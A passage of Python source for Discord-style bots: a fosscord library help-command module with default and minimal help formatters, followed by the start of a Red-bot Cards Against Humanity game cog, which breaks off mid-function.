# since that's used for the injection and ejection of cogs. def wrapped_get_commands(*, _original=cog.get_commands): ret = _original() ret.append(self) return ret # Ditto here def wrapped_walk_commands(*, _original=cog.walk_commands): yield from _original() yield self functools.update_wrapper(wrapped_get_commands, cog.get_commands) functools.update_wrapper(wrapped_walk_commands, cog.walk_commands) cog.get_commands = wrapped_get_commands cog.walk_commands = wrapped_walk_commands self.cog = cog def _eject_cog(self): if self.cog is None: return # revert back into their original methods cog = self.cog cog.get_commands = cog.get_commands.__wrapped__ cog.walk_commands = cog.walk_commands.__wrapped__ self.cog = None class HelpCommand: r"""The base implementation for help command formatting. .. 
note:: Internally instances of this class are deep copied every time the command itself is invoked to prevent a race condition mentioned in :issue:`2123`. This means that relying on the state of this class to be the same between command invocations would not work as expected. Attributes ------------ context: Optional[:class:`Context`] The context that invoked this help formatter. This is generally set after the help command assigned, :func:`command_callback`\, has been called. show_hidden: :class:`bool` Specifies if hidden commands should be shown in the output. Defaults to ``False``. verify_checks: Optional[:class:`bool`] Specifies if commands should have their :attr:`.Command.checks` called and verified. If ``True``, always calls :attr:`.Command.checks`. If ``None``, only calls :attr:`.Command.checks` in a guild setting. If ``False``, never calls :attr:`.Command.checks`. Defaults to ``True``. .. versionchanged:: 1.7 command_attrs: :class:`dict` A dictionary of options to pass in for the construction of the help command. This allows you to change the command behaviour without actually changing the implementation of the command. The attributes will be the same as the ones passed in the :class:`.Command` constructor. """ MENTION_TRANSFORMS = { '@everyone': '@\u200beveryone', '@here': '@\u200bhere', r'<@!?[0-9]{17,22}>': '@deleted-user', r'<@&[0-9]{17,22}>': '@deleted-role', } MENTION_PATTERN = re.compile('|'.join(MENTION_TRANSFORMS.keys())) def __new__(cls, *args, **kwargs): # To prevent race conditions of a single instance while also allowing # for settings to be passed the original arguments passed must be assigned # to allow for easier copies (which will be made when the help command is actually called) # see issue 2123 self = super().__new__(cls) # Shallow copies cannot be used in this case since it is not unusual to pass # instances that need state, e.g. Paginator or what have you into the function # The keys can be safely copied as-is since they're 99.99% certain of being # string keys deepcopy = copy.deepcopy self.__original_kwargs__ = {k: deepcopy(v) for k, v in kwargs.items()} self.__original_args__ = deepcopy(args) return self def __init__(self, **options): self.show_hidden = options.pop('show_hidden', False) self.verify_checks = options.pop('verify_checks', True) self.command_attrs = attrs = options.pop('command_attrs', {}) attrs.setdefault('name', 'help') attrs.setdefault('help', 'Shows this message') self.context: Context = fosscord.utils.MISSING self._command_impl = _HelpCommandImpl(self, **self.command_attrs) def copy(self): obj = self.__class__(*self.__original_args__, **self.__original_kwargs__) obj._command_impl = self._command_impl return obj def _add_to_bot(self, bot): command = _HelpCommandImpl(self, **self.command_attrs) bot.add_command(command) self._command_impl = command def _remove_from_bot(self, bot): bot.remove_command(self._command_impl.name) self._command_impl._eject_cog() def add_check(self, func): """ Adds a check to the help command. .. versionadded:: 1.4 Parameters ---------- func The function that will be used as a check. """ self._command_impl.add_check(func) def remove_check(self, func): """ Removes a check from the help command. This function is idempotent and will not raise an exception if the function is not in the command's checks. .. versionadded:: 1.4 Parameters ---------- func The function to remove from the checks. 
""" self._command_impl.remove_check(func) def get_bot_mapping(self): """Retrieves the bot mapping passed to :meth:`send_bot_help`.""" bot = self.context.bot mapping = {cog: cog.get_commands() for cog in bot.cogs.values()} mapping[None] = [c for c in bot.commands if c.cog is None] return mapping @property def invoked_with(self): """Similar to :attr:`Context.invoked_with` except properly handles the case where :meth:`Context.send_help` is used. If the help command was used regularly then this returns the :attr:`Context.invoked_with` attribute. Otherwise, if it the help command was called using :meth:`Context.send_help` then it returns the internal command name of the help command. Returns --------- :class:`str` The command name that triggered this invocation. """ command_name = self._command_impl.name ctx = self.context if ctx is None or ctx.command is None or ctx.command.qualified_name != command_name: return command_name return ctx.invoked_with def get_command_signature(self, command): """Retrieves the signature portion of the help page. Parameters ------------ command: :class:`Command` The command to get the signature of. Returns -------- :class:`str` The signature for the command. """ parent = command.parent entries = [] while parent is not None: if not parent.signature or parent.invoke_without_command: entries.append(parent.name) else: entries.append(parent.name + ' ' + parent.signature) parent = parent.parent parent_sig = ' '.join(reversed(entries)) if len(command.aliases) > 0: aliases = '|'.join(command.aliases) fmt = f'[{command.name}|{aliases}]' if parent_sig: fmt = parent_sig + ' ' + fmt alias = fmt else: alias = command.name if not parent_sig else parent_sig + ' ' + command.name return f'{self.context.clean_prefix}{alias} {command.signature}' def remove_mentions(self, string): """Removes mentions from the string to prevent abuse. This includes ``@everyone``, ``@here``, member mentions and role mentions. Returns ------- :class:`str` The string with mentions removed. """ def replace(obj, *, transforms=self.MENTION_TRANSFORMS): return transforms.get(obj.group(0), '@invalid') return self.MENTION_PATTERN.sub(replace, string) @property def cog(self): """A property for retrieving or setting the cog for the help command. When a cog is set for the help command, it is as-if the help command belongs to that cog. All cog special methods will apply to the help command and it will be automatically unset on unload. To unbind the cog from the help command, you can set it to ``None``. Returns -------- Optional[:class:`Cog`] The cog that is currently set for the help command. """ return self._command_impl.cog @cog.setter def cog(self, cog): # Remove whatever cog is currently valid, if any self._command_impl._eject_cog() # If a new cog is set then inject it. if cog is not None: self._command_impl._inject_into_cog(cog) def command_not_found(self, string): """|maybecoro| A method called when a command is not found in the help command. This is useful to override for i18n. Defaults to ``No command called {0} found.`` Parameters ------------ string: :class:`str` The string that contains the invalid command. Note that this has had mentions removed to prevent abuse. Returns --------- :class:`str` The string to use when a command has not been found. """ return f'No command called "{string}" found.' def subcommand_not_found(self, command, string): """|maybecoro| A method called when a command did not have a subcommand requested in the help command. This is useful to override for i18n. 
Defaults to either: - ``'Command "{command.qualified_name}" has no subcommands.'`` - If there is no subcommand in the ``command`` parameter. - ``'Command "{command.qualified_name}" has no subcommand named {string}'`` - If the ``command`` parameter has subcommands but not one named ``string``. Parameters ------------ command: :class:`Command` The command that did not have the subcommand requested. string: :class:`str` The string that contains the invalid subcommand. Note that this has had mentions removed to prevent abuse. Returns --------- :class:`str` The string to use when the command did not have the subcommand requested. """ if isinstance(command, Group) and len(command.all_commands) > 0: return f'Command "{command.qualified_name}" has no subcommand named {string}' return f'Command "{command.qualified_name}" has no subcommands.' async def filter_commands(self, commands, *, sort=False, key=None): """|coro| Returns a filtered list of commands and optionally sorts them. This takes into account the :attr:`verify_checks` and :attr:`show_hidden` attributes. Parameters ------------ commands: Iterable[:class:`Command`] An iterable of commands that are getting filtered. sort: :class:`bool` Whether to sort the result. key: Optional[Callable[:class:`Command`, Any]] An optional key function to pass to :func:`py:sorted` that takes a :class:`Command` as its sole parameter. If ``sort`` is passed as ``True`` then this will default as the command name. Returns --------- List[:class:`Command`] A list of commands that passed the filter. """ if sort and key is None: key = lambda c: c.name iterator = commands if self.show_hidden else filter(lambda c: not c.hidden, commands) if self.verify_checks is False: # if we do not need to verify the checks then we can just # run it straight through normally without using await. return sorted(iterator, key=key) if sort else list(iterator) if self.verify_checks is None and not self.context.guild: # if verify_checks is None and we're in a DM, don't verify return sorted(iterator, key=key) if sort else list(iterator) # if we're here then we need to check every command if it can run async def predicate(cmd): try: return await cmd.can_run(self.context) except CommandError: return False ret = [] for cmd in iterator: valid = await predicate(cmd) if valid: ret.append(cmd) if sort: ret.sort(key=key) return ret def get_max_size(self, commands): """Returns the largest name length of the specified command list. Parameters ------------ commands: Sequence[:class:`Command`] A sequence of commands to check for the largest size. Returns -------- :class:`int` The maximum width of the commands. """ as_lengths = (fosscord.utils._string_width(c.name) for c in commands) return max(as_lengths, default=0) def get_destination(self): """Returns the :class:`~fosscord.abc.Messageable` where the help command will be output. You can override this method to customise the behaviour. By default this returns the context's channel. Returns ------- :class:`.abc.Messageable` The destination where the help command will be output. """ return self.context.channel async def send_error_message(self, error): """|coro| Handles the implementation when an error happens in the help command. For example, the result of :meth:`command_not_found` will be passed here. You can override this method to customise the behaviour. By default, this sends the error message to the destination specified by :meth:`get_destination`. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. 
Parameters ------------ error: :class:`str` The error message to display to the user. Note that this has had mentions removed to prevent abuse. """ destination = self.get_destination() await destination.send(error) @_not_overriden async def on_help_command_error(self, ctx, error): """|coro| The help command's error handler, as specified by :ref:`ext_commands_error_handler`. Useful to override if you need some specific behaviour when the error handler is called. By default this method does nothing and just propagates to the default error handlers. Parameters ------------ ctx: :class:`Context` The invocation context. error: :class:`CommandError` The error that was raised. """ pass async def send_bot_help(self, mapping): """|coro| Handles the implementation of the bot command page in the help command. This function is called when the help command is called with no arguments. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. Also, the commands in the mapping are not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ------------ mapping: Mapping[Optional[:class:`Cog`], List[:class:`Command`]] A mapping of cogs to commands that have been requested by the user for help. The key of the mapping is the :class:`~.commands.Cog` that the command belongs to, or ``None`` if there isn't one, and the value is a list of commands that belongs to that cog. """ return None async def send_cog_help(self, cog): """|coro| Handles the implementation of the cog page in the help command. This function is called when the help command is called with a cog as the argument. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. To get the commands that belong to this cog see :meth:`Cog.get_commands`. The commands returned not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ----------- cog: :class:`Cog` The cog that was requested for help. """ return None async def send_group_help(self, group): """|coro| Handles the implementation of the group page in the help command. This function is called when the help command is called with a group as the argument. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. To get the commands that belong to this group without aliases see :attr:`Group.commands`. The commands returned not filtered. To do the filtering you will have to call :meth:`filter_commands` yourself. Parameters ----------- group: :class:`Group` The group that was requested for help. 
""" return None async def send_command_help(self, command): """|coro| Handles the implementation of the single command page in the help command. It should be noted that this method does not return anything -- rather the actual message sending should be done inside this method. Well behaved subclasses should use :meth:`get_destination` to know where to send, as this is a customisation point for other users. You can override this method to customise the behaviour. .. note:: You can access the invocation context with :attr:`HelpCommand.context`. .. admonition:: Showing Help :class: helpful There are certain attributes and methods that are helpful for a help command to show such as the following: - :attr:`Command.help` - :attr:`Command.brief` - :attr:`Command.short_doc` - :attr:`Command.description` - :meth:`get_command_signature` There are more than just these attributes but feel free to play around with these to help you get started to get the output that you want. Parameters ----------- command: :class:`Command` The command that was requested for help. """ return None async def prepare_help_command(self, ctx, command=None): """|coro| A low level method that can be used to prepare the help command before it does anything. For example, if you need to prepare some state in your subclass before the command does its processing then this would be the place to do it. The default implementation does nothing. .. note:: This is called *inside* the help command callback body. So all the usual rules that happen inside apply here as well. Parameters ----------- ctx: :class:`Context` The invocation context. command: Optional[:class:`str`] The argument passed to the help command. """ pass async def command_callback(self, ctx, *, command=None): """|coro| The actual implementation of the help command. It is not recommended to override this method and instead change the behaviour through the methods that actually get dispatched. - :meth:`send_bot_help` - :meth:`send_cog_help` - :meth:`send_group_help` - :meth:`send_command_help` - :meth:`get_destination` - :meth:`command_not_found` - :meth:`subcommand_not_found` - :meth:`send_error_message` - :meth:`on_help_command_error` - :meth:`prepare_help_command` """ await self.prepare_help_command(ctx, command) bot = ctx.bot if command is None: mapping = self.get_bot_mapping() return await self.send_bot_help(mapping) # Check if it's a cog cog = bot.get_cog(command) if cog is not None: return await self.send_cog_help(cog) maybe_coro = fosscord.utils.maybe_coroutine # If it's not a cog then it's a command. # Since we want to have detailed errors when someone # passes an invalid subcommand, we need to walk through # the command group chain ourselves. keys = command.split(' ') cmd = bot.all_commands.get(keys[0]) if cmd is None: string = await maybe_coro(self.command_not_found, self.remove_mentions(keys[0])) return await self.send_error_message(string) for key in keys[1:]: try: found = cmd.all_commands.get(key) except AttributeError: string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key)) return await self.send_error_message(string) else: if found is None: string = await maybe_coro(self.subcommand_not_found, cmd, self.remove_mentions(key)) return await self.send_error_message(string) cmd = found if isinstance(cmd, Group): return await self.send_group_help(cmd) else: return await self.send_command_help(cmd) class DefaultHelpCommand(HelpCommand): """The implementation of the default help command. This inherits from :class:`HelpCommand`. 
It extends it with the following attributes. Attributes ------------ width: :class:`int` The maximum number of characters that fit in a line. Defaults to 80. sort_commands: :class:`bool` Whether to sort the commands in the output alphabetically. Defaults to ``True``. dm_help: Optional[:class:`bool`] A tribool that indicates if the help command should DM the user instead of sending it to the channel it received it from. If the boolean is set to ``True``, then all help output is DM'd. If ``False``, none of the help output is DM'd. If ``None``, then the bot will only DM when the help message becomes too long (dictated by more than :attr:`dm_help_threshold` characters). Defaults to ``False``. dm_help_threshold: Optional[:class:`int`] The number of characters the paginator must accumulate before getting DM'd to the user if :attr:`dm_help` is set to ``None``. Defaults to 1000. indent: :class:`int` How much to indent the commands from a heading. Defaults to ``2``. commands_heading: :class:`str` The command list's heading string used when the help command is invoked with a category name. Useful for i18n. Defaults to ``"Commands:"`` no_category: :class:`str` The string used when there is a command which does not belong to any category(cog). Useful for i18n. Defaults to ``"No Category"`` paginator: :class:`Paginator` The paginator used to paginate the help command output. """ def __init__(self, **options): self.width = options.pop('width', 80) self.indent = options.pop('indent', 2) self.sort_commands = options.pop('sort_commands', True) self.dm_help = options.pop('dm_help', False) self.dm_help_threshold = options.pop('dm_help_threshold', 1000) self.commands_heading = options.pop('commands_heading', "Commands:") self.no_category = options.pop('no_category', 'No Category') self.paginator = options.pop('paginator', None) if self.paginator is None: self.paginator = Paginator() super().__init__(**options) def shorten_text(self, text): """:class:`str`: Shortens text to fit into the :attr:`width`.""" if len(text) > self.width: return text[:self.width - 3].rstrip() + '...' return text def get_ending_note(self): """:class:`str`: Returns help command's ending note. This is mainly useful to override for i18n purposes.""" command_name = self.invoked_with return ( f"Type {self.context.clean_prefix}{command_name} command for more info on a command.\n" f"You can also type {self.context.clean_prefix}{command_name} category for more info on a category." ) def add_indented_commands(self, commands, *, heading, max_size=None): """Indents a list of commands after the specified heading. The formatting is added to the :attr:`paginator`. The default implementation is the command name indented by :attr:`indent` spaces, padded to ``max_size`` followed by the command's :attr:`Command.short_doc` and then shortened to fit into the :attr:`width`. Parameters ----------- commands: Sequence[:class:`Command`] A list of commands to indent for output. heading: :class:`str` The heading to add to the output. This is only added if the list of commands is greater than 0. max_size: Optional[:class:`int`] The max size to use for the gap between indents. If unspecified, calls :meth:`~HelpCommand.get_max_size` on the commands parameter. 
""" if not commands: return self.paginator.add_line(heading) max_size = max_size or self.get_max_size(commands) get_width = fosscord.utils._string_width for command in commands: name = command.name width = max_size - (get_width(name) - len(name)) entry = f'{self.indent * " "}{name:<{width}} {command.short_doc}' self.paginator.add_line(self.shorten_text(entry)) async def send_pages(self): """A helper utility to send the page output from :attr:`paginator` to the destination.""" destination = self.get_destination() for page in self.paginator.pages: await destination.send(page) def add_command_formatting(self, command): """A utility function to format the non-indented block of commands and groups. Parameters ------------ command: :class:`Command` The command to format. """ if command.description: self.paginator.add_line(command.description, empty=True) signature = self.get_command_signature(command) self.paginator.add_line(signature, empty=True) if command.help: try: self.paginator.add_line(command.help, empty=True) except RuntimeError: for line in command.help.splitlines(): self.paginator.add_line(line) self.paginator.add_line() def get_destination(self): ctx = self.context if self.dm_help is True: return ctx.author elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold: return ctx.author else: return ctx.channel async def prepare_help_command(self, ctx, command): self.paginator.clear() await super().prepare_help_command(ctx, command) async def send_bot_help(self, mapping): ctx = self.context bot = ctx.bot if bot.description: # <description> portion self.paginator.add_line(bot.description, empty=True) no_category = f'\u200b{self.no_category}:' def get_category(command, *, no_category=no_category): cog = command.cog return cog.qualified_name + ':' if cog is not None else no_category filtered = await self.filter_commands(bot.commands, sort=True, key=get_category) max_size = self.get_max_size(filtered) to_iterate = itertools.groupby(filtered, key=get_category) # Now we can add the commands to the page. for category, commands in to_iterate: commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands) self.add_indented_commands(commands, heading=category, max_size=max_size) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_command_help(self, command): self.add_command_formatting(command) self.paginator.close_page() await self.send_pages() async def send_group_help(self, group): self.add_command_formatting(group) filtered = await self.filter_commands(group.commands, sort=self.sort_commands) self.add_indented_commands(filtered, heading=self.commands_heading) if filtered: note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_cog_help(self, cog): if cog.description: self.paginator.add_line(cog.description, empty=True) filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands) self.add_indented_commands(filtered, heading=self.commands_heading) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() class MinimalHelpCommand(HelpCommand): """An implementation of a help command with minimal output. This inherits from :class:`HelpCommand`. Attributes ------------ sort_commands: :class:`bool` Whether to sort the commands in the output alphabetically. Defaults to ``True``. 
commands_heading: :class:`str` The command list's heading string used when the help command is invoked with a category name. Useful for i18n. Defaults to ``"Commands"`` aliases_heading: :class:`str` The alias list's heading string used to list the aliases of the command. Useful for i18n. Defaults to ``"Aliases:"``. dm_help: Optional[:class:`bool`] A tribool that indicates if the help command should DM the user instead of sending it to the channel it received it from. If the boolean is set to ``True``, then all help output is DM'd. If ``False``, none of the help output is DM'd. If ``None``, then the bot will only DM when the help message becomes too long (dictated by more than :attr:`dm_help_threshold` characters). Defaults to ``False``. dm_help_threshold: Optional[:class:`int`] The number of characters the paginator must accumulate before getting DM'd to the user if :attr:`dm_help` is set to ``None``. Defaults to 1000. no_category: :class:`str` The string used when there is a command which does not belong to any category(cog). Useful for i18n. Defaults to ``"No Category"`` paginator: :class:`Paginator` The paginator used to paginate the help command output. """ def __init__(self, **options): self.sort_commands = options.pop('sort_commands', True) self.commands_heading = options.pop('commands_heading', "Commands") self.dm_help = options.pop('dm_help', False) self.dm_help_threshold = options.pop('dm_help_threshold', 1000) self.aliases_heading = options.pop('aliases_heading', "Aliases:") self.no_category = options.pop('no_category', 'No Category') self.paginator = options.pop('paginator', None) if self.paginator is None: self.paginator = Paginator(suffix=None, prefix=None) super().__init__(**options) async def send_pages(self): """A helper utility to send the page output from :attr:`paginator` to the destination.""" destination = self.get_destination() for page in self.paginator.pages: await destination.send(page) def get_opening_note(self): """Returns help command's opening note. This is mainly useful to override for i18n purposes. The default implementation returns :: Use `{prefix}{command_name} [command]` for more info on a command. You can also use `{prefix}{command_name} [category]` for more info on a category. Returns ------- :class:`str` The help command opening note. """ command_name = self.invoked_with return ( f"Use `{self.context.clean_prefix}{command_name} [command]` for more info on a command.\n" f"You can also use `{self.context.clean_prefix}{command_name} [category]` for more info on a category." ) def get_command_signature(self, command): return f'{self.context.clean_prefix}{command.qualified_name} {command.signature}' def get_ending_note(self): """Return the help command's ending note. This is mainly useful to override for i18n purposes. The default implementation does nothing. Returns ------- :class:`str` The help command ending note. """ return None def add_bot_commands_formatting(self, commands, heading): """Adds the minified bot heading with commands to the output. The formatting should be added to the :attr:`paginator`. The default implementation is a bold underline heading followed by commands separated by an EN SPACE (U+2002) in the next line. Parameters ----------- commands: Sequence[:class:`Command`] A list of commands that belong to the heading. heading: :class:`str` The heading to add to the line. 
""" if commands: # U+2002 Middle Dot joined = '\u2002'.join(c.name for c in commands) self.paginator.add_line(f'__**{heading}**__') self.paginator.add_line(joined) def add_subcommand_formatting(self, command): """Adds formatting information on a subcommand. The formatting should be added to the :attr:`paginator`. The default implementation is the prefix and the :attr:`Command.qualified_name` optionally followed by an En dash and the command's :attr:`Command.short_doc`. Parameters ----------- command: :class:`Command` The command to show information of. """ fmt = '{0}{1} \N{EN DASH} {2}' if command.short_doc else '{0}{1}' self.paginator.add_line(fmt.format(self.context.clean_prefix, command.qualified_name, command.short_doc)) def add_aliases_formatting(self, aliases): """Adds the formatting information on a command's aliases. The formatting should be added to the :attr:`paginator`. The default implementation is the :attr:`aliases_heading` bolded followed by a comma separated list of aliases. This is not called if there are no aliases to format. Parameters ----------- aliases: Sequence[:class:`str`] A list of aliases to format. """ self.paginator.add_line(f'**{self.aliases_heading}** {", ".join(aliases)}', empty=True) def add_command_formatting(self, command): """A utility function to format commands and groups. Parameters ------------ command: :class:`Command` The command to format. """ if command.description: self.paginator.add_line(command.description, empty=True) signature = self.get_command_signature(command) if command.aliases: self.paginator.add_line(signature) self.add_aliases_formatting(command.aliases) else: self.paginator.add_line(signature, empty=True) if command.help: try: self.paginator.add_line(command.help, empty=True) except RuntimeError: for line in command.help.splitlines(): self.paginator.add_line(line) self.paginator.add_line() def get_destination(self): ctx = self.context if self.dm_help is True: return ctx.author elif self.dm_help is None and len(self.paginator) > self.dm_help_threshold: return ctx.author else: return ctx.channel async def prepare_help_command(self, ctx, command): self.paginator.clear() await super().prepare_help_command(ctx, command) async def send_bot_help(self, mapping): ctx = self.context bot = ctx.bot if bot.description: self.paginator.add_line(bot.description, empty=True) note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) no_category = f'\u200b{self.no_category}' def get_category(command, *, no_category=no_category): cog = command.cog return cog.qualified_name if cog is not None else no_category filtered = await self.filter_commands(bot.commands, sort=True, key=get_category) to_iterate = itertools.groupby(filtered, key=get_category) for category, commands in to_iterate: commands = sorted(commands, key=lambda c: c.name) if self.sort_commands else list(commands) self.add_bot_commands_formatting(commands, category) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_cog_help(self, cog): bot = self.context.bot if bot.description: self.paginator.add_line(bot.description, empty=True) note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) if cog.description: self.paginator.add_line(cog.description, empty=True) filtered = await self.filter_commands(cog.get_commands(), sort=self.sort_commands) if filtered: self.paginator.add_line(f'**{cog.qualified_name} {self.commands_heading}**') for command in filtered: 
self.add_subcommand_formatting(command) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_group_help(self, group): self.add_command_formatting(group) filtered = await self.filter_commands(group.commands, sort=self.sort_commands) if filtered: note = self.get_opening_note() if note: self.paginator.add_line(note, empty=True) self.paginator.add_line(f'**{self.commands_heading}**') for command in filtered: self.add_subcommand_formatting(command) note = self.get_ending_note() if note: self.paginator.add_line() self.paginator.add_line(note) await self.send_pages() async def send_command_help(self, command): self.add_command_formatting(command) self.paginator.close_page() await self.send_pages()
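# Usage sketch: the implementations above are installed by assigning to a
# bot's ``help_command`` attribute, the customisation point the docstrings
# describe. The ``fosscord.ext.commands`` Bot shown here mirrors the
# discord.py API this module follows; the exact import path and option
# values are illustrative assumptions, not part of this module.
#
#     from fosscord.ext import commands
#
#     bot = commands.Bot(command_prefix="!")
#     # Swap in the minimal help, relabel the fallback category, and DM the
#     # output only once a page grows past 500 characters (dm_help=None).
#     bot.help_command = MinimalHelpCommand(
#         no_category="Other", dm_help=None, dm_help_threshold=500
#     )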
import asyncio
import discord
import html
import json
import random
import time
from random import shuffle

from redbot.core import commands
from redbot.core.data_manager import bundled_data_path


class CardsAgainstHumanity(commands.Cog):
    def __init__(self, bot):
        self.bot = bot
        self.games = []
        self.maxBots = (
            5  # Max number of bots that can be added to a game - don't count toward max players
        )
        self.maxPlayers = 10  # Max players for random joins
        self.maxDeadTime = 3600  # Allow an hour of dead time before killing a game
        self.checkTime = 300  # 5 minutes between dead time checks
        self.winAfter = 10  # 10 wins for the game
        self.botWaitMin = (
            5  # Minimum number of seconds before the bot makes a decision (default 5)
        )
        self.botWaitMax = 30  # Max number of seconds before a bot makes a decision (default 30)
        self.userTimeout = 300  # 5 minutes to timeout
        self.utCheck = 30  # Check timeout every 30 seconds
        self.utWarn = 60  # Warn the user if they have 60 seconds or less before being kicked
        self.charset = "1234567890"
        self.botName = "Rando Cardrissian"
        self.minMembers = 3
        self.bot.loop.create_task(self.checkDead())
        self.bot.loop.create_task(self.checkUserTimeout())

    def cleanJson(self, json):
        json = html.unescape(json)  # Clean out html formatting
        json = json.replace("_", "[blank]")
        json = json.replace("<br>", "\n")
        json = json.replace("<br/>", "\n")
        json = json.replace("<i>", "*")
        json = json.replace("</i>", "*")
        return json

    def displayname(self, member: discord.Member):
        # A helper function to return the member's display name
        nick = name = None
        try:
            nick = member.nick
        except AttributeError:
            pass
        try:
            name = member.name
        except AttributeError:
            pass
        if nick:
            return nick
        if name:
            return name
        return None

    def memberforname(self, name, server):
        # Check nick first - then name
        for member in server.members:
            if member.nick:
                if member.nick.lower() == name.lower():
                    return member
        for member in server.members:
            if member.name.lower() == name.lower():
                return member
        # No member yet - try ID
        memID = "".join(list(filter(str.isdigit, name)))
        newMem = self.memberforid(memID, server)
        if newMem:
            return newMem
        return None

    @staticmethod
    def memberforid(checkid, server):
        for member in server.members:
            if str(member.id) == str(checkid):
                return member
        return None

    def getreadabletimebetween(self, first, last):
        # A helper function to make a readable string between two times
        timeBetween = int(last - first)
        weeks = int(timeBetween / 604800)
        days = int((timeBetween - (weeks * 604800)) / 86400)
        hours = int((timeBetween - (days * 86400 + weeks * 604800)) / 3600)
        minutes = int((timeBetween - (hours * 3600 + days * 86400 + weeks * 604800)) / 60)
        seconds = int(timeBetween - (minutes * 60 + hours * 3600 + days * 86400 + weeks * 604800))
        msg = ""
        if weeks > 0:
            if weeks == 1:
                msg = f"{msg}{str(weeks)} week, "
            else:
                msg = f"{msg}{str(weeks)} weeks, "
        if days > 0:
            if days == 1:
                msg = f"{msg}{str(days)} day, "
            else:
                msg = f"{msg}{str(days)} days, "
        if hours > 0:
            if hours == 1:
                msg = f"{msg}{str(hours)} hour, "
            else:
                msg = f"{msg}{str(hours)} hours, "
        if minutes > 0:
            if minutes == 1:
                msg = f"{msg}{str(minutes)} minute, "
            else:
                msg = f"{msg}{str(minutes)} minutes, "
        if seconds > 0:
            if seconds == 1:
                msg = f"{msg}{str(seconds)} second, "
            else:
                msg = f"{msg}{str(seconds)} seconds, "
        if not msg:
            return "0 seconds"
        else:
            return msg[:-2]

    async def checkUserTimeout(self):
        while True:
            # Wait first - then check
            await asyncio.sleep(self.utCheck)
            for game in self.games:
                if not game["Timeout"]:
                    continue
                if len(game["Members"]) >= self.minMembers:
                    # Game is started
for member in game["Members"]: if member["IsBot"]: continue if game["Judging"]: if not member == game["Members"][game["Judge"]]: # Not the judge - don't hold against the user member["Time"] = int(time.time()) continue else: # Not judging if member == game["Members"][game["Judge"]]: # The judge - don't hold that against them member["Time"] = int(time.time()) continue currentTime = int(time.time()) userTime = member["Time"] downTime = currentTime - userTime # Check if downTime results in a kick if downTime >= self.userTimeout: # You gettin kicked, son. await self.removeMember(member["User"]) self.checkGame(game) continue # Check if downTime is in warning time if downTime >= (self.userTimeout - self.utWarn): # Check if we're at warning phase if self.userTimeout - downTime >= (self.utWarn - self.utCheck): kickTime = self.userTimeout - downTime if kickTime % self.utCheck: # Kick time isn't exact time - round out to the next loop kickTime = kickTime - (kickTime % self.utCheck) + self.utCheck # Warning time! timeString = self.getreadabletimebetween(0, kickTime) await member["User"].send( f"**WARNING** - You will be kicked from the game if you do not make a move in *{timeString}!*" ) else: for member in game["Members"]: # Reset timer member["Time"] = int(time.time()) async def checkDead(self): while True: # Wait first - then check await asyncio.sleep(self.checkTime) for game in self.games: gameTime = game["Time"] currentTime = int(time.time()) timeRemain = currentTime - gameTime if timeRemain > self.maxDeadTime: # Game is dead - quit it and alert members for member in game["Members"]: if member["IsBot"]: # Clear pending tasks and set to None if not member["Task"] == None: task = member["Task"] if not task.done(): task.cancel() member["Task"] = None continue await member["User"].send( f"Game id: *{game["ID"]}* has been closed due to inactivity." 
) # Set running to false game["Running"] = False self.games.remove(game) async def checkPM(self, message): # Checks if we're talking in PM, and if not - outputs an error if isinstance(message.channel, discord.abc.PrivateChannel): # PM return True else: # Not in PM await message.channel.send("Cards Against Humanity commands must be run in PM.") return False def randomID(self, length=8): # Create a random id that doesn't already exist while True: # Repeat until found newID = "".join(random.choice(self.charset) for i in range(length)) exists = False for game in self.games: if game["ID"] == newID: exists = True break if not exists: break return newID def randomBotID(self, game, length=4): # Returns a random id for a bot that doesn't already exist while True: # Repeat until found newID = "".join(random.choice(self.charset) for i in range(length)) exists = False for member in game["Members"]: if member["ID"] == newID: exists = True break if not exists: break return newID async def userGame(self, user): # Returns the game the user is currently in if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id for game in self.games: for member in game["Members"]: if member["ID"] == user: # Found our user return game return None def gameForID(self, id): # Returns the game with the passed id for game in self.games: if game["ID"] == id: return game return None async def removeMember(self, user, game=None): if not len(str(user)) == 4: if not type(user) is int: # Assume it's a discord.Member/User user = user.id outcome = False removed = None if not game: game = await self.userGame(user) if game: for member in game["Members"]: if member["ID"] == user: removed = member outcome = True judgeChanged = False # Reset judging flag to retrigger actions game["Judging"] = False # Get current Judge - only if game has started if len(game["Members"]) >= self.minMembers: judge = game["Members"][game["Judge"]] game["Members"].remove(member) # Check if we're removing the current judge if judge == member: # Judge will change judgeChanged = True # Find out if our member was the last in line if game["Judge"] >= len(game["Members"]): game["Judge"] = 0 # Reset judge var judge = game["Members"][game["Judge"]] else: # Judge didn't change - so let's reset judge index index = game["Members"].index(judge) game["Judge"] = index else: judge = None # Just remove the member game["Members"].remove(member) if member["Creator"]: # We're losing the game creator - pick a new one for newCreator in game["Members"]: if not newCreator["IsBot"]: newCreator["Creator"] = True await newCreator["User"].send( "The creator of this game left. **YOU** are now the creator." ) break # Remove submissions for sub in game["Submitted"]: # Remove deleted member and new judge's submissions if sub["By"] == member or 